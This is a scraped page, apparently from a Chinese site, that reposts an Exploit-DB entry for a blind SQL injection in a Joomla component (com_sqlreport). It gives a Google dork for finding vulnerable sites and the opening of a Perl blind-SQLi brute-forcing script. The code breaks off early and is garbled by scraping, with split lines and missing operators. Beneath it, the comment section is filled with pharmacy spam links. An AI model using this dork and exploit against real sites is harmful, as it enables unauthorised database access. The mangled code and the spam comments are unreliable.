首页 > SMT产品 > Joomla user_ID com_sqlreport組件的SQL註盲漏洞

Joomla user_ID com_sqlreport組件的SQL註盲漏洞

发表于：2010-02-26 14:49:24 点击: 445

# Title: Joomla Component user_id com_sqlreport Blind SQL Injection Vulnerability

# EDB-ID: 11549

# CVE-ID: ()

# OSVDB-ID: ()

# Author: Snakespc

# Published: 2010-02-23

# Verified: no

# DownloadExploit Code

# Download N/A

view source

print ?

==============================================================================

[»]Joomla Component user_id com_sqlreport Blind SQL Injection Vulnerability

==============================================================================

[»] Script: [Joomla]

[»] Language: [ PHP ]

[»] Founder: [ Snakespc Email:super_cristal

@hotmail

.com - Site:sec-war.com/cc> ]

[»] Greetz to:[ sec-warTeaM, PrEdAtOr ,alnjm33 >>> All My Mamber >> sec-war.com/cc ]

[»] Dork:inurl:

"com_sqlreport"

[»]

###########################################################################

===[ Exploit ]===POC Blind Joomla (user_id) com_sqlreport >>>>Note::Placés dans un dossier C:\Perl\bin\snakespc.pl

###########################################################################

#!/usr/bin/perl

use

LWP::UserAgent;

use

Getopt::Long;

use

IO::Handle;

use

strict;

$| = 1;

###############################################################################

$default_debug

= 0;

$default_length

= 32;

$default_method

"GET"

;

$default_time

= 0;

$version

"1.1"

;

$default_useragent

"bsqlbf $version"

;

$default_dict

"dict.txt"

;

$default_sql

"version()"

;

###############################################################################

$| = 1;

(

$args

$abc

$solution

);

(

$string

$char

@dic

);

(

%vars

@varsb

);

(

$lastvar

$lastval

);

(

$scheme

$authority

$path

$query

$fragment

);

$hits

= 0;

$usedict

= 0;

$amatch

= 0;

(

$ua

$req

);

###############################################################################

#Define GetOpt:

(

$url

$sql

$time

$rtime

$match

$uagent

$charset

$debug

);

(

$proxy

$proxy_user

$proxy_pass

$rproxy

$ruagent

);

(

$dict

$start

$length

$method

$cookie

$blind

);

(

$help

$bincharset

$get

$nodict

);

$options

= GetOptions (

'help!'

=> \

$help

'url=s'

=> \

$url

'get=s'

=> \

$get

'sql=s'

=> \

$sql

查看原文收藏本页关闭页面

0 投票

标签： ICT

上一篇：引用 2009年2月26日
下一篇： 58.装饰石膏板自动化生产线成型设备

文章评论

E3lrvitra 发表于: 2011-10-22 12:49:55
Luogo eccellente. Era piacevole me -- HP: http://www.evroshipping.com/ (!)
F9retima 发表于: 2011-10-22 12:31:58
Your work is very intellectual. Super url http://www.evroshipping.com/products/evista.htm *ROFL*
W4hoodiaweightlossgm 发表于: 2011-10-22 12:13:02
your comment2 ;)) site: www.evroshipping.com/products/study-habits.htm
Ditrooan2b 发表于: 2011-10-22 11:53:27
Thank you for good job ;) WEBSITE: _http://www.evroshipping.com/products/lariam.htm ..
Viagrs 发表于: 2011-10-22 11:33:31
comment2: url: ttp://www.evroshipping.com/products/alpha-lipoic-acid.htm :cry:
Cialis 发表于: 2011-10-22 11:13:07
Thanks you web _ttp://www.evroshipping.com/products/coreg.htm mzy
Avandia 发表于: 2011-10-22 10:55:35
Bekwame recht o_O visit _ttp://www.evroshipping.com/products/cefixime.htm !!! :!:
Anafranol9r 发表于: 2011-10-22 10:38:59
+3 xttp://www.evroshipping.com/products/ranitidine.htm czkou
Lvitraprofessional9m 发表于: 2011-10-22 10:22:19
your comments1: SITE ttp://www.evroshipping.com/products/kamagra.htm +
Kevitra 发表于: 2011-10-22 10:00:44
Keep movin! Write more

1 2 3 4 5 6 7 8 9 10 下一页最后一页

Joomla user_ID com_sqlreport組件的SQL註盲漏洞

文章评论

发表评论

更多>>热门点击排行

更多>>本类别推荐文章